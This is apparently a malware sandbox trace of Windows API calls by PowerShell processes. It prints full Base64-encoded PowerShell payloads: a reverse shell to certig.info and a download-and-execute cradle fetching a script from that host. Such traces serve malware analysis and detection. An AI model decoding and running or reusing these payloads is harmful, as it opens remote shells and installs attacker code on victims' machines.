	[0122.911] FindClose (in: hFindFile=0x1cddc6b0 | out: hFindFile=0x1cddc6b0) returned 1
	[0122.912] SetErrorMode (uMode=0x1) returned 0x1
	[0122.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c60d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0122.983] SetErrorMode (uMode=0x1) returned 0x1
	[0122.983] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c60dac0 | out: lpFileInformation=0x1c60dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0122.983] SetErrorMode (uMode=0x1) returned 0x1
	[0122.984] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0122.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.984] CoTaskMemFree (pv=0x28f6c0) 
	[0122.985] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0122.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.985] CoTaskMemFree (pv=0x28f6c0) 
	[0123.024] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0123.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.024] CoTaskMemFree (pv=0x28f6c0) 
	[0123.250] CoTaskMemAlloc (cb=0x3b) returned 0x1ce291f0
	[0123.300] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c60dca8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c60dca8) returned 0x4550
	[0123.301] CoTaskMemFree (pv=0x1ce291f0) 
	[0123.304] GetConsoleWindow () returned 0x5026a
	[0123.315] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0123.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.315] CoTaskMemFree (pv=0x28f6c0) 
	[0123.317] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0123.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.317] CoTaskMemFree (pv=0x28f6c0) 
	[0123.462] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0123.462] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.462] CoTaskMemFree (pv=0x28f6c0) 
	[0123.474] CommandLineToArgvW (in: lpCmdLine=" -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFAAYgBIAEsAQQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABZAFEARwBYAGcAPQAoACQAUABiAEgASwBBAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABkAFIAZgB3AFYAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABUAEwAZgBHAG8APQAkAFkAUQBHAFgAZwAuAFIAZQBhAGQAKAAkAGQAUgBmAHcAVgAsADAALAAkAGQAUgBmAHcAVgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAEwAZABEAG4AQQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABSAGYAdwBWACwAMAAsACQAVABMAGYARwBvACkAOwAkAE4ARQB4AEcAUgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQATABkAEQAbgBBACAAMgA+ACYAMQApACkAOwAkAFkAUQBHAFgAZwAuAFcAcgBpAHQAZQAoACQATgBFAHgARwBSACwAMAAsACQATgBFAHgARwBSAC4ATABlAG4AZwB0AGgAKQA7ACQAWQBRAEcAWABnAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABQAGIASABLAEEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUABiAEgASwBBAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", pNumArgs=0x1c60dcf0 | out: pNumArgs=0x1c60dcf0) returned 0x1cdcb570*=""
	[0123.474] lstrlenW (lpString="-encodedCommand") returned 15
	[0123.474] CoTaskMemAlloc (cb=0x22) returned 0x1cdd5250
	[0123.474] RtlMoveMemory (in: Destination=0x1cdd5250, Source=0x1cdcb592, Length=0x20 | out: Destination=0x1cdd5250) 
	[0123.474] CoTaskMemFree (pv=0x1cdd5250) 
	[0123.474] lstrlenW (lpString="IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFAAYgBIAEsAQQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABZAFEARwBYAGcAPQAoACQAUABiAEgASwBBAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABkAFIAZgB3AFYAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABUAEwAZgBHAG8APQAkAFkAUQBHAFgAZwAuAFIAZQBhAGQAKAAkAGQAUgBmAHcAVgAsADAALAAkAGQAUgBmAHcAVgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAEwAZABEAG4AQQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABSAGYAdwBWACwAMAAsACQAVABMAGYARwBvACkAOwAkAE4ARQB4AEcAUgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQATABkAEQAbgBBACAAMgA+ACYAMQApACkAOwAkAFkAUQBHAFgAZwAuAFcAcgBpAHQAZQAoACQATgBFAHgARwBSACwAMAAsACQATgBFAHgARwBSAC4ATABlAG4AZwB0AGgAKQA7ACQAWQBRAEcAWABnAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABQAGIASABLAEEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUABiAEgASwBBAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==") returned 1736
	[0123.474] CoTaskMemAlloc (cb=0xd94) returned 0x1ce0cf20
	[0123.474] RtlMoveMemory (in: Destination=0x1ce0cf20, Source=0x1cdcb5b2, Length=0xd92 | out: Destination=0x1ce0cf20) 
	[0123.475] CoTaskMemFree (pv=0x1ce0cf20) 
	[0123.476] LocalFree (hMem=0x1cdcb570) returned 0x0
	[0123.802] CoTaskMemAlloc (cb=0x804) returned 0x1b361a20
	[0123.802] GetConsoleTitleW (in: lpConsoleTitle=0x1b361a20, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0123.802] CoTaskMemFree (pv=0x1b361a20) 
	[0123.808] CoTaskMemAlloc (cb=0xe2e) returned 0x1cdcb570
	[0123.808] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFAAYgBIAEsAQQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABZAFEARwBYAGcAPQAoACQAUABiAEgASwBBAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABkAFIAZgB3AFYAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABUAEwAZgBHAG8APQAkAFkAUQBHAFgAZwAuAFIAZQBhAGQAKAAkAGQAUgBmAHcAVgAsADAALAAkAGQAUgBmAHcAVgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAEwAZABEAG4AQQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABSAGYAdwBWACwAMAAsACQAVABMAGYARwBvACkAOwAkAE4ARQB4AEcAUgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQATABkAEQAbgBBACAAMgA+ACYAMQApACkAOwAkAFkAUQBHAFgAZwAuAFcAcgBpAHQAZQAoACQATgBFAHgARwBSACwAMAAsACQATgBFAHgARwBSAC4ATABlAG4AZwB0AGgAKQA7ACQAWQBRAEcAWABnAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABQAGIASABLAEEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUABiAEgASwBBAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c60dc50*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f53f40 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFAAYgBIAEsAQQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABZAFEARwBYAGcAPQAoACQAUABiAEgASwBBAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABkAFIAZgB3AFYAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABUAEwAZgBHAG8APQAkAFkAUQBHAFgAZwAuAFIAZQBhAGQAKAAkAGQAUgBmAHcAVgAsADAALAAkAGQAUgBmAHcAVgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAEwAZABEAG4AQQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABSAGYAdwBWACwAMAAsACQAVABMAGYARwBvACkAOwAkAE4ARQB4AEcAUgA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQATABkAEQAbgBBACAAMgA+ACYAMQApACkAOwAkAFkAUQBHAFgAZwAuAFcAcgBpAHQAZQAoACQATgBFAHgARwBSACwAMAAsACQATgBFAHgARwBSAC4ATABlAG4AZwB0AGgAKQA7ACQAWQBRAEcAWABnAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABQAGIASABLAEEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUABiAEgASwBBAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessInformation=0x2f53f40*(hProcess=0x6c4, hThread=0x6c0, dwProcessId=0xaa0, dwThreadId=0x320)) returned 1
	[0123.812] CoTaskMemFree (pv=0x1cdcb570) 
	[0123.813] CloseHandle (hObject=0x6c0) returned 1
	[0123.813] CoTaskMemAlloc (cb=0x3b) returned 0x1ce291f0
	[0123.813] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c60dcf8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c60dcf8) returned 0x4550
	[0123.813] CoTaskMemFree (pv=0x1ce291f0) 
	[0123.815] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.816] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.816] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c60ddd8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c60ddd8*=0x6c0) returned 1

Thread:
	id = 134
	os_tid = 0x2dc


Thread:
	id = 137
	os_tid = 0x758


Thread:
	id = 140
	os_tid = 0x3f8

	[0119.148] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0119.153] ResetEvent (hEvent=0x3ac) returned 1
	[0229.947] QueryContextAttributesW (in: phContext=0x1c7de950, ulAttribute=0x1a, pBuffer=0x1c7dead0 | out: pBuffer=0x1c7dead0) returned 0x0
	[0230.570] DeleteSecurityContext (phContext=0x1c7de120) returned 0x0
	[0230.572] shutdown (s=0x4d4, how=2) returned 0
	[0230.573] setsockopt (s=0x4d4, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0230.573] closesocket (s=0x4d4) returned 0
	[0262.978] CoUninitialize () 

Thread:
	id = 144
	os_tid = 0x330


Process:
	id = "8"
	image_name = "powershell.exe"
	filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3bdae000"
	os_pid = "0x888"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 107
	os_tid = 0xa18

	[0102.247] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0102.766] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0102.766] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0102.766] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0102.766] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0104.460] GetVersionExW (in: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.461] GetLastError () returned 0x2
	[0104.462] GetVersionExW (in: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.462] GetLastError () returned 0x2
	[0104.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e36c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.469] GetLastError () returned 0x2
	[0104.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.662] GetLastError () returned 0x2
	[0104.662] GetVersionExW (in: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x721bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.662] GetLastError () returned 0x2
	[0104.663] SetErrorMode (uMode=0x1) returned 0x1
	[0104.664] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14e808 | out: lpFileInformation=0x14e808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0104.664] GetLastError () returned 0x2
	[0104.664] SetErrorMode (uMode=0x1) returned 0x1
	[0104.778] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14e88c | out: lpdwHandle=0x14e88c) returned 0x94c
	[0104.779] GetLastError () returned 0x0
	[0104.780] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x29f4f50 | out: lpData=0x29f4f50) returned 1
	[0104.882] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e858, puLen=0x14e854 | out: lplpBuffer=0x14e858*=0x29f4fec, puLen=0x14e854) returned 1
	[0104.884] lstrlenW (lpString="䅁") returned 1
	[0105.324] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f50c8, puLen=0x14e7d0) returned 1
	[0105.324] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0105.329] lstrcpyW (in: lpString1=0x721bd8, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0105.331] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f511c, puLen=0x14e7d0) returned 1
	[0105.331] lstrlenW (lpString="System.Management.Automation") returned 28
	[0105.331] lstrcpyW (in: lpString1=0x721bd8, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0105.331] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f5178, puLen=0x14e7d0) returned 1
	[0105.331] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.331] lstrcpyW (in: lpString1=0x721bd8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.331] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f51b8, puLen=0x14e7d0) returned 1
	[0105.331] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.331] lstrcpyW (in: lpString1=0x721bd8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.331] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f5220, puLen=0x14e7d0) returned 1
	[0105.331] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0105.332] lstrcpyW (in: lpString1=0x721bd8, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
